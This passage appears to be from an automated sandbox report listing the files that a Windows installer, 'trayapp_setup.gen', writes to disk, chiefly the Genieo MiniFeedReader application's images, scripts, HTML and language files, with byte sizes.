C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\images\code\code2.jpg (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\tmp\wpm_v20.0.0.1714.exe (16288 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\UninstallManager.exe (59286 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\images\code\code1.jpg (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\lpd#4.3.0.xpi (6360 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\G44ROL1L\1[1].zip (296615 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\MessageBox.xml (3 bytes)

The process trayapp_setup.gen:1992 makes changes in the file system.
The Application creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\x_white.png (222 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tack1.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tack4.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\miniview.js (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\anabel_ui.js (1856 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\buttonBg.png (141 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\twitter_bird.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\anabel_data.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tack1sm.png (769 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\shared\js\GenieoPartnerWindow.js (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tm1frame1sm.png (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\genieo_logo2.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\red.gif (801 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\notif_big\js\main.js (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\splash_bg.jpg (9 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\cluster_default1.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\birthday.png (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\tpl\settings.tpl (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\notif_big\img\button.png (342 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\notif_big\notification.html (937 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\notification_disabled_nav_next.png (161 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\img\warming_up.gif (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\miniview\opera_extension.png (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\notif_big\img\notification_controls.png (441 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tm3frame_8.png (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\shared\js\Preferences.js (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\extOpera1.png (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\big_image_frame.png (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tm3frameSm.png (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tm3frame_8sm.png (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\genieo_slogan_fr.png (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\tryAgainButton.png (710 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\css\fr.css (211 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\miniview.html (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsvAF24.tmp (82165 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\page_arrows_blue.png (277 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\genieo_slogan_inner_ru.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\heart.png (658 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\shared\js\ServerConnector.js (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\cmd_close_red.gif (840 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\genieoRss.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\notif\notification.html (860 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\buttonSp.png (837 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\partner_item_bg.gif (879 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\default_image.png (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\.project (487 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\miniview\set_full_view_btn.png (536 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\previewPublish.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\css\birthday.css (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\notification_disabled_nav_prev.png (164 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\extSafariWin1.png (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\notif\img\button.png (342 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\magazinePreview\title.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\prototype.jsonp.js (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\okCancelButton.png (734 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\ad_no_image.png (876 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\cluster_default.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\notification_popup_bg.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\miniview\bummer.png (750 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\extFirefoxMac3.png (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\hotItemIcon.png (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\img\happy.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tm3frame_6.png (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\social_icons.png (893 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\redSqSm.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\extChromeMac1.png (10 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\twitterButton.png (955 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\h_bg.png (331 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\lang\field_ru.properties (1552 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\attention.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\settings.html (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\favorite_site_mask.png (176 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\aggregation.html (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\miniview\x.gif (828 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\all-genieo-sp-pack.js (15168 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\share_btn.png (625 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\objectivehot_enabled_nav_prev.png (153 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\big_quote.gif (203 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\message_note.png (696 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\shared\js\DataProcessor.js (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\weather-overcast.png (975 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\extFirefoxMac1.png (10 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\page_arrows.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\ohBg.gif (879 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\layer.html (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\img\prog_bar_prog.gif (166 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\img\upper_border.gif (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\weather-clear-night.png (961 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\follow_facebook_btn.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\splash_video_bg.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\lang\field_ru.json (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\round_corners_5px.png (182 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\sendFeedbackButton.jpg (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tm3frame_4.png (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\prog_bar_prog.gif (141 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\css\ie8.css (745 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\miniview\item_bg.png (264 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\picFrames.png (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\img\disabled_nav_next.gif (855 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\anabel_application.js (9 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\collage\template1.html (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\slideshow.js (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\constants.js (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\miniview\share_btn.png (553 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\pagelet.js (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\browser_not_supported.html (125 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\smallGrey.gif (803 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\covers.png (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tack2.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\birthday\footer_bg.png (121 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\miniview\older_items_arrow.gif (49 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\sidebar_text_ad_bg.png (564 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\arrow_down.gif (68 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\extFinishButton.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\analytics.html (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\itemsRotate.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\template1_.jpg (1552 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\objectivehot_disabled_nav_next.png (161 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\rssButton.png (580 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tm3frame.png (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\template3sm.jpg (7192 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\notif\hp_guard.html (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\grad.png (171 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\collage\template2.html (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\google_search_btn.png (166 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\sad.png (971 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\miniview\login_facebook_btn.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\shared\js\jquery.min.js (3312 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\bug.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\shared\js\json.js (11 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tack3sm.png (937 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\img\disabled_nav_next2.gif (90 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\logDbgLoadPhase.js (51 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\social_connector.js (11 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\weather-few-clouds-night.png (965 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\tw.gif (241 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\birthday\bg.jpg (1552 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\x.gif (828 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\set_to_miniview.png (203 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\grey.gif (817 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\notif\js\utils.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\message_heart.png (765 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tm3frame_3.png (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\fbButton.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\share_popup_arrow.png (219 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\personalization_meter_bg.png (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\shared\js\utils.js (1552 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\template1.jpg (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\Activators.js (1856 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\noitems.html (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\followbutton.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\logo_icon.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\lang\orig\field_fr.properties (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\icons\thumb_up.png (697 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\splash.js (13 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\notif_big\img\default_image.jpg (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\notif_big\js\classes.js (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\signUpButton.png (863 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\anabel_main.js (1552 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\birthday_not_connected_bg.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\notif\img\warning.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\miniview\pagging_arrows.png (227 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\icons\bug.png (682 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\LocationManager.js (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\js\notification_ui.js (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\miniview\birthday_cake.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\small_arrow_down.png (192 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\share_unfollow.png (849 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\extSafariMac.png (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tm3frame_5.png (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\prog_bar.gif (101 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\settings\buttonSp.png (837 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\topic_x.png (329 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\css\ie7.css (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\facebook_twitter.png (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\img\welcome_home.gif (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\dialogWarning.png (520 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\core.html (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\google_search_input_logo.png (903 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\follow_twitter_btn.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\message_note.png (696 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\footer.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\weatherimg.gif (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\genieo_slogan_ru.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\uninstall\trayapp_uninstall.exe (825 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\css\ru.css (630 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\ok.png (769 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\x_small.png (832 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\notif\css\main.css (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\weather-severe-alert.png (977 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\birthday.js (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\rss.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\template2.png (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\white.gif (965 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\social_baloon_tip.png (158 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\shadowv.png (939 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\extNextButton.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\weather-snow.png (998 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\class.js (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\syncOnButton.png (566 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\body_bg.png (323 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\box_controls.png (814 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\lang\field_en.json (16 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\UIState.js (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\redirect_handler.html (796 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\notif\img\counter_bg.png (270 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\previewShareDisabled.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\collage\js\collage.js (9 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\img\counter_bg.png (270 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tack5.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\big_video_frame.png (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tm1frame3.png (587 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\redSq.png (136 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\pagelet_tip_white.png (217 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\weather-storm.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\css\partner.css (930 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tm3frame_10.png (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\splash_video.jpg (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\css\notify.css (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\hotItemIcon.jpg (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\ajax-loader.gif (10 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\miniview\default.png (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\lang\orig\field_ru.properties (784 bytes)
